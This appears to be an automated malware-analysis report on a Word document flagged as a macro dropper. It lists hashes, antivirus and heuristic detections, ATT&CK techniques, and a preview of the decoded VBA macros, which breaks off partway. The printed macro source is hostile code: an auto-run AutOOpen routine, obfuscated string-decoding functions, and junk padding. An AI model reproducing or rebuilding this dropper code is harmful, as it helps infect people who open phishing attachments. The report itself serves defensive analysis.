Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5e7a1ed5f9a1fbc9…

MALICIOUS

Office (OLE)

Size: 69.0 KB
Created: 2018-06-11 10:40:00
Authoring application: Microsoft Office Word
First seen: 2019-01-25
MD5: 09794329ffa605c623b941cd0e3ed0ee
SHA-1: 848d26d600987315e483d46f506ab1ce501f537e
SHA-256: 5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The document body and heuristics indicate a lure to enable macros, a common tactic used by malware droppers. The VBA macro 'AutOOpen' is present and configured to execute upon opening (VBA procedure names are case-insensitive, so the unusual capitalisation does not stop Word from treating it as AutoOpen), likely to download and execute a second-stage payload. The presence of 'CreateObject' and 'CallByName' calls within the macro further suggests malicious intent.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-6581558-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6581558-0
  • VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call
  • CallByName call (high) [OLE_VBA_CALLBYNAME]
    CallByName call
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium) [SE_ENABLE_LURE]
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9312 bytes
SHA-256: c3f100af113f914a265279db3855c6f2c8e96a8d5d075b72d08f7b942347cb64
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
domino1964
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
End Sub


Attribute VB_Name = "ACCEPTED"
Function accessruy()
accessruy = nake3344
End Function

Function nake3344()
nake3344 = guest1974(xytroftu.buggerme)
End Function

Function crack_serial()
crack_serial = xytroftu.waswas
End Function

Function luctynbu()
luctynbu = gogoose1.xaza1111
End Function

Function chicojosie(cleissin, wambapvo)
linksenior = Left(cleissin, wambapvo)
chicojosie = legendagp(linksenior)
End Function

Function legendagp(plankpin)
legendagp = Right(plankpin, 1)
End Function

Function portroas()
portroas = "/usgc;]x]/lEmaQR/aE.]/"
End Function


Attribute VB_Name = "aveidlegiB"
Function nymphroa(servroor As String, NZIsxFonq As Integer) As String
Dim Gjyznysq As Integer
Gjyznysq = 0
suzuki100 = 17 + 43
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
For botanistbotanist = 1 To 90
If (chicojosie(ninvaude, botanistbotanist) = servroor) Then
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
   Gjyznysq = botanistbotanist
    Exit For
End If
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
Next botanistbotanist
Gjyznysq = IIf(Gjyznysq - NZIsxFonq <= 0, 90 + Gjyznysq - NZIsxFonq, Gjyznysq - NZIsxFonq)
nymphroa = chicojosie(ninvaude, Gjyznysq)
End Function

Function liophia5()
liophia5 = pedanaeb.AVEEKERUHC
End Function

Function mygodfen(vonabloT, AVONUBED, cfmrnb69, jaxmeoff)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
gogoose1.tralcodg = lawstorm(vonabloT, AVONUBED) + cassie169(vonabloT, cfmrnb69) + anesabya(jaxmeoff)
End Function

Sub domino1964()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
pedanaeb.vanomerd = "ourlomeb"
End Sub


Attribute VB_Name = "Flawacid"
Function sublessee(mrjrb827, fooldelta)
sublessee = ationdri(Int((mrjrb827 * churedro()) + fooldelta))
End Function

Function ationdri(anyzrata)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
ationdri = CInt(anyzrata)
End Function

Function lawstorm(chenabcd, ajaxdude)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
lawstorm = guest1974(gogoose1.cancerfrog) + chenabcd + guest1974(tiggerisp.kinsscri) + _
 ajaxdude + guest1974(gogoose1.gogueacr + gogoose1.signtist) + ajaxdude
End Function

Function anesabya(attilapat)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
anesabya = guest1974(portroas + xytroftu.BBCFKUJC) + attilapat + _
guest1974(xytroftu.AVOKNELOBE) + attilapat + guest1974(pedanaeb.moczeegi)
End Function

Function ninvaude()
ninvaude = pedanaeb.ruxcontrol
End Function


Attribute VB_Name = "gogoos
... (truncated)